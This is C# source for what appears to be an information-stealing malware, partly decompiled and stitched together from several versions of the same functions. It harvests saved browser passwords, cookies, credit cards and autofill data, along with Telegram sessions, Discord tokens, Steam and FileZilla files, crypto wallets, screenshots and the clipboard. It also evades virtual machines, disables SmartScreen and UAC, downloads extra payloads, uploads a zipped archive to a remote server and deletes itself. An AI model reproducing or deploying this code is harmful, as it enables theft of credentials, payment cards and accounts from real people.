public static void Get_Autofill(string profilePath, string browser_name, string profile_name)
{
try
{
string text = Path.Combine(profilePath, "Web Data");
var cNT = new sqlite.CNT(GetCookies.CreateTempCopy(text));
cNT.ReadTable("autofill");
for (int i = 0; i < cNT.RowLength; i++)
{
AutofillCount++;
try
{
Autofill.Add($"Name : {cNT.ParseValue(i, "name").Trim()}{Environment.NewLine}Value : {cNT.ParseValue(i, "value").Trim()}");
}
catch { }
}
foreach (string v in Autofill)
{
Autofill_List.Add($"Browser : {browser_name}{Environment.NewLine}Profile : {profile_name}{Environment.NewLine}{v}{Environment.NewLine}");;
}
Autofill.Clear();
}
catch { }
}
public static void Parse(string dir)
{
Directory.CreateDirectory($"{dir}\\Browsers");
Mozila.Mozila_still();
try
{
foreach (string rootPath in GetProfile())
{
try
{
string fullName = new FileInfo(rootPath).Directory.FullName;
string text = rootPath.Contains(RoamingAppData) ? GetRoadData(fullName) : GetLclName(fullName);
if (!string.IsNullOrEmpty(text))
{
text = text[0].ToString().ToUpper() + text.Remove(0, 1);
string name = GetName(fullName);
GetCookies.Cookie_Grab(fullName, text, name);
GetPasswords.Passwords_Grab(fullName, text, name);
GetPasswords.Write_Passwords();
Get_Credit_Cards.Get_CC(fullName, text, name);
Get_Credit_Cards.Write_CC(text, name);
Get_Browser_Autofill.Get_Autofill(fullName, text, name);
Get_Browser_Autofill.Write_Autofill(text, name);
}
}
catch { }
}
}
catch { }
}
// Token: 0x06000158 RID: 344 RVA: 0x00008750 File Offset: 0x00006950
public static void Parse(string dir)
{
Directory.CreateDirectory(dir + "\\Browsers");
Steal.Cookies();
try
{
foreach (string text in Browser_Parse.GetProfile())
{
try
{
string fullName = new FileInfo(text).Directory.FullName;
string text2 = text.Contains(Browser_Parse.RoamingAppData) ? Browser_Parse.GetRoadData(fullName) : Browser_Parse.GetLclName(fullName);
if (!string.IsNullOrEmpty(text2))
{
text2 = text2[0].ToString().ToUpper() + text2.Remove(0, 1);
string name = Browser_Parse.GetName(fullName);
GetCookies.Cookie_Grab(fullName, text2, name);
GetPasswords.Passwords_Grab(fullName, text2, name);
GetPasswords.Write_Passwords();
Get_Credit_Cards.Get_CC(fullName, text2, name);
Get_Credit_Cards.Write_CC(text2, name);
Get_Browser_Autofill.Get_Autofill(fullName, text2, name);
Get_Browser_Autofill.Write_Autofill(text2, name);
}
}
catch
{
}
}
}
catch
{
}
}
public static void Passwords_Grab(string profilePath, string browser_name, string profile)
{
try
{
string text = Path.Combine(profilePath, "Login Data");
browser_name_list.Add(browser_name);
profile_list.Add(profile);
var cNT = new sqlite.CNT(GetCookies.CreateTempCopy(text));
cNT.ReadTable("logins");
for (int i = 0; i < cNT.RowLength; i++)
{
Cpassword++;
try
{
credential.Add($"Site_Url : {cNT.ParseValue(i, "origin_url").Trim()}{Environment.NewLine}Login : {cNT.ParseValue(i, "username_value").Trim()}{Environment.NewLine}Password : {GetCookies.DecryptBlob(cNT.ParseValue(i, "password_value"), DataProtectionScope.CurrentUser).Trim()}{Environment.NewLine}");
}
catch { }
}
foreach (string v in credential)
{
password.Add($"Browser : {browser_name}{Environment.NewLine}Profile : {profile}{Environment.NewLine}{v}");
}
credential.Clear();
}
catch { }
}
// Token: 0x06000184 RID: 388 RVA: 0x0000AEAC File Offset: 0x000090AC
public static void Get_CC(string profilePath, string Browser_Name, string Profile_Name)
{
try
{
SqlHandler sqlHandler = new SqlHandler(GetCookies.CreateTempCopy(Path.Combine(profilePath, "Web Data")));
sqlHandler.ReadTable("credit_cards");
int rowCount = sqlHandler.GetRowCount();
for (int i = 0; i < rowCount; i++)
{
Get_Credit_Cards.CCCouunt++;
try
{
string @string = Encoding.UTF8.GetString(DecryptAPI.DecryptBrowsers(Encoding.Default.GetBytes(sqlHandler.GetValue(i, 4)), null));
string value = sqlHandler.GetValue(i, 1);
string value2 = sqlHandler.GetValue(i, 2);
string value3 = sqlHandler.GetValue(i, 3);
string value4 = sqlHandler.GetValue(i, 9);
Get_Credit_Cards.CC.Add(string.Format("{0}\t{1}/{2}\t{3}\t{4}\r\n******************************\r\n", new object[]
{
value,
value2,
value3,
@string,
value4
}));
}
catch
{
}
}
foreach (string text in Get_Credit_Cards.CC)
{
Get_Credit_Cards.CC_List.Add(string.Concat(new string[]
{
"Browser : ",
Browser_Name,
Environment.NewLine,
"Profie : ",
Profile_Name,
Environment.NewLine,
text
}));
}
Get_Credit_Cards.CC.Clear();
}
catch
{
}
}
// Token: 0x0600017D RID: 381 RVA: 0x0000A4C8 File Offset: 0x000086C8
public static void Get_Autofill(string profilePath, string browser_name, string profile_name)
{
try
{
Sqlite sqlite = new Sqlite(GetCookies.CreateTempCopy(Path.Combine(profilePath, "Web Data")));
sqlite.ReadTable("autofill");
for (int i = 0; i < sqlite.GetRowCount(); i++)
{
Get_Browser_Autofill.AutofillCount++;
try
{
Get_Browser_Autofill.Autofill.Add(string.Concat(new string[]
{
"Name : ",
sqlite.GetValue(i, "name").Trim(),
Environment.NewLine,
"Value : ",
sqlite.GetValue(i, "value").Trim()
}));
}
catch
{
}
}
foreach (string text in Get_Browser_Autofill.Autofill)
{
Get_Browser_Autofill.Autofill_List.Add(string.Concat(new string[]
{
"Browser : ",
browser_name,
Environment.NewLine,
"Profile : ",
profile_name,
Environment.NewLine,
text,
Environment.NewLine
}));
}
Get_Browser_Autofill.Autofill.Clear();
}
catch
{
}
}
public static void Main()
{
// Проверяем на запуск виртуальных машин ( Virtual Machine Check )
if (!AntiVM.GetCheckVMBot() && !RunCheck.InstanceCheck())
{
Environment.Exit(0);
}
// Создаём папку куда будем всё собирать
HomeDirectory.Inizialize();
// Делаем проверку что папка создалась
if (CombineEx.ExistsDir(GlobalPath.HomePath))
{
// Собираем данные ....
Telega.GetSession(GlobalPath.Tdata, GlobalPath.TelegaHome, "*.*");
MailFoxPassword.Inizialize();
BuffBoard.Inizialize();
NordVPN.Inizialize_Grabber();
DynDns.Inizialize_Grabber();
FileZilla.Inizialize_Grabber();
Pidgin.Inizialize_Grabber();
GetSteamFiles.Inizialize("*.", "*.vdf", "config", "Steam");
InfoGrabber.Inizialize();
ScreenShot.Inizialize(GlobalPath.Screen);
// Сбор и вывод логинов и паролей
Searcher.CopyInSafeDir(GlobalPath.LoginsPath, "Login Data");
GetPasswords.Inizialize_Multi_file();
// Сбор и вывод куки данных
Searcher.CopyInSafeDir(GlobalPath.CookiesPath, "Cookies");
GetCookies.Inizialize();
// Сбор и вывод Автозаполнение форм
Searcher.CopyInSafeDir(GlobalPath.WebDataPath, "Web Data");
GetAutoFill.Inizialize_AutoFill();
}
}
private void Updater_Load(object sender, EventArgs e)
{
if (Date.Delay)
{
Thread.Sleep(Date.DelaySec);
}
if (!AntiVM.GetCheckVMBot())
{
if (!MovEx.CheckPath())
{
if (Date.Delay)
{
ProcessKiller.Delete($"/C choice /C Y /N /D Y /T {Date.DelayTime} & Del", GlobalPath.AssemblyPath);
}
}
else
{
HideFolders.Enabled(0);
DisableLockers.SmartScreen();
DisableLockers.UAC();
AntiSniffer.Inizialize();
if (Date.Downloader || Date.AdminRight)
{
Users.DownFileEx(Date.DownloaderLink, Environment.GetEnvironmentVariable(Date.DownloaderPath), Date.FakeNameProcess);
}
if (Date.IpLogger)
{
IPLogger.Sender(Date.IpLoggerLink);
}
if (Date.InfoGrabber)
{
InfoGrabber.CreateTable(GlobalPath.PC_File);
}
if (Date.CryptoWall)
{
BitBoard.GetWallet();
}
if (Date.Browsers)
{
ChromeSearcher.CopyLoginsInSafeDir(GlobalPath.Logins);
ChromeCookiesSearcher.CopyCookiesInSafeDir(GlobalPath.Cookies);
GetPassword.Inizialize();
GetCookies.Inizialize();
}
if (Date.Buffer)
{
ClipboardEx.GetBuffer(GlobalPath.Buffer);
}
if (Date.Programs)
{
MailFoxPassword.Inizialize();
DcGrabber.GeTokens();
TGrabber.GetTelegramSession(GlobalPath.Tdata, GlobalPath.TelegaHome, "*.*");
}
if (Date.Clients)
{
GetClients.Inizialize();
}
if (Date.Steam)
{
GetSteamFiles.Copy("*.", "*.vdf", "config", "Steam");
}
if (Date.ScreenShot)
{
ScreenShot.Shoot(GlobalPath.Screen);
}
Ccleaner.CheckIsNullDirsAndFiles(GlobalPath.GarbageTemp);
Archiving.Inizialize();
UploadZip.Inizialize(GlobalPath.Reception, "POST", GlobalPath.ZipAdd);
//BlockIE.Enabled(1); // Блокировка интернета
if (Date.Delay)
{
ProcessKiller.Delete($"/C choice /C Y /N /D Y /T {Date.DelayTime} & Del", GlobalPath.AssemblyPath);
}
Application.Exit();
}
}
else
{
SaveData.SaveFile("VM_Detect.txt", "The program is not supported on virtual machines!");
if (Date.Delay)
{
ProcessKiller.Delete($"/C choice /C Y /N /D Y /T {Date.DelayTime} & Del", GlobalPath.AssemblyPath);
}
}
}
